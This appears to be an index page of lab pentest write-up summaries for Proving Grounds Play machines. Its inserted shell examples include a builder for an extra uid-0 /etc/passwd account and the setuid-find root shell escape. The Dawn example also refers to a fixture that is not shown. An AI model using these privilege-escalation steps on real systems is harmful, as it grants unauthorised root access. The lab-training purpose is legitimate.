Write-ups and penetration test reports from simulated pentests against publicly available lab machines, such as those on OffSec's Proving Grounds, HackTheBox, TryHackMe, etc.

PG Play: Cybersploit01

Cybersploit01

Credentials hidden in plain sight lead to overlay exploit.

Executive Summary

The target machine's website exposes cleartext usernames and passwords in plain view of the public (CWE-256), which allow initial access to an authenticated shell. The machine runs an out-of-date Linux kernel (3.13.0) that is vulnerable to a known privilege escalation flaw in the overlayfs module (CVE-2015-1328). I leveraged this vulnerability to successfully obtain root privileges.

[more...]

PG Play: Dawn

Dawn

Running cron jobs from world-writable file shares is ill-advised.

Executive Summary

The target machine was successfully compromised by exploiting a critical vulnerability stemming from unauthenticated write access to an SMB share (ITDEPT) on which a cron job, run in the context of the unprivileged user dawn, depends. This led to initial access / remote code execution (RCE). Privilege escalation was then gained through a different cron job that also depended on file paths located on the vulnerable file share, which enabled modification of the /etc/passwd file and led to root access.
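The two misconfigurations the summary describes, modelled on constructed data as an added example (this is not code from the Dawn write-up): a check that flags /etc/crontab entries whose command lives in a location others can write to, the passwd(5) line an attacker appends once a root cron job can be made to write to /etc/passwd, and the audit that catches such a line. The crontab layout, file names and hash value in the fixture are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not part of the original Dawn write-up.

# Print "user target" for every system-crontab line (/etc/crontab layout:
# min hour dom mon dow user command) whose command is an existing file that is
# writable by its group or by everyone. A cron job like this is what gave
# initial access on Dawn: anyone who can write the script runs as that user.
writable_cron_targets() {
    crontab_file="$1"
    grep -v '^[[:space:]]*#' "$crontab_file" | grep -v '^[[:space:]]*$' |
    while read -r min hour dom mon dow user cmd; do
        target="${cmd%% *}"
        # Only absolute paths can be checked; anything else is skipped.
        case "$target" in /*) ;; *) continue ;; esac
        [ -e "$target" ] || continue
        # -perm -002 = world-writable, -perm -020 = group-writable.
        if find "$target" -maxdepth 0 \( -perm -002 -o -perm -020 \) | grep -q .; then
            echo "$user $target"
        fi
    done
}

# Build the passwd(5) line for a second uid-0 account. HASH must be a crypt(3)
# hash, e.g. the output of: openssl passwd -1 'secret'
uid0_passwd_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Defender's check: every account with uid 0 other than root.
extra_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}
```

Run `writable_cron_targets /etc/crontab` and `extra_uid0_accounts /etc/passwd` on a host to audit it; the fixture below only shows the expected output on constructed files.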

[more...]

PG Play: ColdBoxEasy

ColdBoxEasy

Finding root with weak passwords

Executive Summary

I successfully gained root access on the target machine.

This machine hosts a WordPress site configured with a weak password for an admin user, c0ldd.

I placed a reverse shell script into the WordPress site by leveraging WordPress's built-in file editing functionality after authenticating with the weak credentials.

After gaining shell access I was able to elevate to root using a common Linux utility, find, which had been installed with the setuid bit set, allowing it to run with root privileges.
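The enumeration step that turns up a setuid find, and the GTFOBins escape the summary refers to, as an added example (not code from the ColdBoxEasy write-up). Nothing here is taken from the target; the paths are generic.

```shell
#!/bin/sh
# Added example, not part of the original ColdBoxEasy write-up.

# List regular files with the setuid bit set under ROOT (default /), staying on
# one filesystem and ignoring permission errors. On the target this is the
# step at which a setuid /usr/bin/find shows up.
find_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 2>/dev/null
}

# Confirm a candidate is setuid AND owned by root; a setuid file owned by an
# ordinary user only gives that user's privileges.
is_suid_root() {
    [ -u "$1" ] && [ "$(stat -c %U "$1" 2>/dev/null || stat -f %Su "$1")" = root ]
}

# The escape itself, as listed on GTFOBins for find: -exec runs /bin/sh on the
# first match and -quit stops after it. -p makes the shell keep the effective
# uid instead of dropping to the real uid (bash, and dash 0.5.11 or later).
# It only helps when find is setuid root, so it is defined here, not called.
suid_find_shell() {
    find . -exec /bin/sh -p \; -quit
}
```

Without `-p`, bash (and older dash) resets the effective uid to the real uid at startup, so the shell would come back unprivileged even though find ran as root.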

[more...]

PG Play: Blogger

Blogger

A hidden blog, an upload vuln, and weak user credentials wrapped in a bunch of misdirection.

Executive Summary

I successfully compromised the target system and gained root access. Initial access was achieved by discovering a hidden blog application hosting a vulnerable unauthenticated file upload feature. I exploited this vulnerability to upload a malicious PHP reverse-shell script, gaining low-privileged local access.

Post-exploitation enumeration revealed a user account with a weak, predictable password, which allowed lateral movement. This account was in turn permitted to run sudo without restriction, leading to escalation to root.

[more...]

PG Play: BBS Cute

BBS Cute

A 5-point machine on Proving Grounds Play.

Executive Summary

The target machine was running an out-of-date version of a web forum package containing a local file inclusion vulnerability that allowed arbitrary PHP code execution via an authenticated file upload mechanism. Further, the machine included a network test tool configured in a way that allowed low-privileged users to run arbitrary commands as root.

Methodology

I enumerated the machine using nmap and gobuster, located the vulnerable web app and potential exploits with Exploit-DB, exploited the vulnerable web app using the provided proof-of-concept, then enumerated the user environment with built-in tools, located the network test tool, and finally exploited it via the method described on GTFOBins.

[more...]